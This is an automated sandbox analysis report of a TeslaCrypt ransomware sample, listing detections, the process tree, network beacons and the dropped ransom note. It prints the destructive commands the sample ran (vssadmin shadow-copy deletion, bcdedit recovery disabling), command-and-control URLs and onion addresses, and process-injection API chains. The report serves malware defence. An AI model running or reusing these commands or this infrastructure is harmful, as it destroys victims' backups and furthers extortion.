Analysis Report safecrypt.exe

Overview

General Information

Sample Name: safecrypt.exe
Analysis ID: 375304
MD5: 4a1d88603b1007825a9c6b36d1e5de44
SHA1: 78a6e76ab32039576b52153b56f2e8bd035222c3
SHA256: 7004af389d633b82c3ee67055ecb0f9accae5dc0a53721da66c76825ece528f8

Detection

TeslaCrypt
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected TeslaCrypt Ransomware
Contains functionality to inject code into remote processes
Creates autostart registry keys with suspicious names
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Found potential ransomware demand text
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • safecrypt.exe (PID: 4964 cmdline: 'C:\Users\user\Desktop\safecrypt.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • safecrypt.exe (PID: 5784 cmdline: 'C:\Users\user\Desktop\safecrypt.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
      • mllvvvh.exe (PID: 6072 cmdline: C:\Users\user\AppData\Roaming\mllvvvh.exe MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
        • mllvvvh.exe (PID: 5860 cmdline: C:\Users\user\AppData\Roaming\mllvvvh.exe MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
          • bcdedit.exe (PID: 3700 cmdline: bcdedit.exe /set {current} bootems off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • vssadmin.exe (PID: 4676 cmdline: 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
            • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 5944 cmdline: bcdedit.exe /set {current} advancedoptions off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 4112 cmdline: bcdedit.exe /set {current} optionsedit off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 6032 cmdline: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 6008 cmdline: bcdedit.exe /set {current} recoveryenabled off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5864 cmdline: 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mllvvvh.exe (PID: 1224 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • mllvvvh.exe (PID: 5880 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
  • mllvvvh.exe (PID: 4648 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • mllvvvh.exe (PID: 1724 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
  • mllvvvh.exe (PID: 2916 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • mllvvvh.exe (PID: 5844 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp | JoeSecurity_TeslaCrypt | Yara detected TeslaCrypt Ransomware | Joe Security
00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp | JoeSecurity_TeslaCrypt | Yara detected TeslaCrypt Ransomware | Joe Security
00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs

Unpacked PEs

Source | Rule | Description | Author
4.1.mllvvvh.exe.400000.0.unpack | JoeSecurity_TeslaCrypt | Yara detected TeslaCrypt Ransomware | Joe Security
4.1.mllvvvh.exe.400000.0.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
1.2.safecrypt.exe.400000.0.unpack | JoeSecurity_TeslaCrypt | Yara detected TeslaCrypt Ransomware | Joe Security
1.2.safecrypt.exe.400000.0.unpack | Win32_Ransomware_Teslacrypt | unknown | ReversingLabs
1.1.safecrypt.exe.400000.0.unpack | JoeSecurity_TeslaCrypt | Yara detected TeslaCrypt Ransomware | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
  Source: safecrypt.exe | Avira: detected
Antivirus detection for URL or domain
  Source: http://pot98bza3sgfjr35t.fausttime.com/BC32439525276233 | Avira URL Cloud: Label: phishing
  Source: http://pot98bza3sgfjr35t.fausttime.com/%S | Avira URL Cloud: Label: phishing
  Source: http://pot98bza3sgfjr35t.fausttime.com/%S2. | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Metadefender: Detection: 73%
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | ReversingLabs: Detection: 96%
Multi AV Scanner detection for submitted file
  Source: safecrypt.exe | Virustotal: Detection: 91%
  Source: safecrypt.exe | Metadefender: Detection: 73%
  Source: safecrypt.exe | ReversingLabs: Detection: 96%
Machine Learning detection for sample
  Source: safecrypt.exe | Joe Sandbox ML: detected

Compliance:

Detected unpacking (overwrites its own PE header)
  Source: C:\Users\user\Desktop\safecrypt.exe | Unpacked PE file: 1.2.safecrypt.exe.400000.0.unpack
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Unpacked PE file: 20.2.mllvvvh.exe.400000.0.unpack
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Unpacked PE file: 23.2.mllvvvh.exe.400000.0.unpack
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Unpacked PE file: 25.2.mllvvvh.exe.400000.0.unpack
  Source: safecrypt.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
  Source: C:\Users\user\Desktop\safecrypt.exe | Code function: 1_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,1_2_00413AD0
  Source: C:\Users\user\Desktop\safecrypt.exe | Code function: 1_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,1_1_00413AD0
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Code function: 4_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,4_1_00413AD0
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Code function: 20_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,20_2_00413AD0
  Source: C:\Users\user\Desktop\safecrypt.exe | Code function: 1_2_00413860 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,1_2_00413860

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic | Snort IDS: 2022504 ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon 192.168.2.6:49709 -> 185.53.178.54:80
  Source: Traffic | Snort IDS: 2022504 ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon 192.168.2.6:49710 -> 52.60.87.163:80
Found Tor onion address
  Source: safecrypt.exe | String found in binary or memory: r personal pages: http://pot98bza3sgfjr35t.fausttime.com/%S http://h5534bvnrnkj345.maniupulp.com/%S http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S !!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S !!! Your personal identification ID: %S
  Source: mllvvvh.exe | String found in binary or memory: r personal pages: http://pot98bza3sgfjr35t.fausttime.com/%S http://h5534bvnrnkj345.maniupulp.com/%S http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S !!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S !!! Your personal identification ID: %S
  Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
  Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
  Source: global traffic | HTTP traffic detected: POST /modules/mod_fxprev/libraries/mzsys.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: educarpetas.com
    Content-Length: 645
    Cache-Control: no-cache
  Source: global traffic | HTTP traffic detected: POST /tmp/mzsys.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: iicsdrd.com
    Content-Length: 645
    Cache-Control: no-cache
  Source: C:\Users\user\AppData\Roaming\mllvvvh.exe | Code function: 4_1_0041BE60 InternetReadFile,4_1_0041BE60
  Source: unknown | DNS traffic detected: queries for: southinstrument.org
  Source: unknown | HTTP traffic detected: POST /modules/mod_fxprev/libraries/mzsys.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
    Host: educarpetas.com
    Content-Length: 645
    Cache-Control: no-cache
  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 24 Mar 2021 17:31:33 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: safecrypt.exe, 00000000.00000002.326079443.0000000000ABA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            Spam, unwanted Advertisements and Ransom Demands:

            Yara detected TeslaCrypt Ransomware
            Source: Yara matchFile source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 1724, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 5844, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 5860, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: safecrypt.exe PID: 5784, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 5880, type: MEMORY
            Source: Yara matchFile source: 4.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.safecrypt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.1.safecrypt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.1.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Deletes shadow drive data (may be related to ransomware)
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Process created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
            Source: vssadmin.exe, 00000008.00000002.339155452.000001A8958F5000.00000004.00000040.sdmpBinary or memory string: C:\Windows\System32\vssadmin.exedeleteshadows/all/QuietZ
            Source: vssadmin.exe, 00000008.00000002.339181911.000001A895930000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
            Source: vssadmin.exe, 00000008.00000002.339181911.000001A895930000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
            Found potential ransomware demand text
            Source: mllvvvh.exe, 00000004.00000003.361953647.000000000076D000.00000004.00000001.sdmp String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
            Source: help_recover_instructions+fnc.txt76.4.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
            May disable shadow drive data (uses vssadmin)
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe Process created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Writes a notice file (html or txt) to demand a ransom
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. what do i do ? so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way. if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://pot98bza3sgfjr35t.fausttime.com/bc32439525276233 2. http://h5534bvnrnkj345.maniupulp.com/bc32439525276233 3. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233 if for some reasons the addresses are not available, follow these steps: 1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization. 3. type in the add
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\$Recycle.Bin\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.txt
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe File dropped: C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.txt

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 00000014.00000001.355902917.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 4.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.2.safecrypt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.1.safecrypt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.2.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 20.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 4.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 23.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 25.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: 1.1.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681828 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681828
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681B1B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681B1B
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_0268186D VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_0268186D
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681C63 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681C63
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A67 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A67
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A4C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A4C
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681C5C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681C5C
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681852 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681852
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A22 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A22
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A30 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A30
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681836 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681836
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681C37 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681C37
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A0A CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A0A
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681C00 NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681C00
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681C1C NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681C1C
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026818E3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026818E3
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026818FF CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026818FF
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681AF1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681AF1
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681ADB CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681ADB
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026818D5 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026818D5
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_026816A6 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_026816A6
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681AB1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681AB1
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A8C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A8C
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681899 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681899
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681892 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681892
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681A93 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681A93
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681B60 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681B60
            Source: C:\Users\user\Desktop\safecrypt.exe Code function: 0_2_02681963 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory, 0_2_02681963
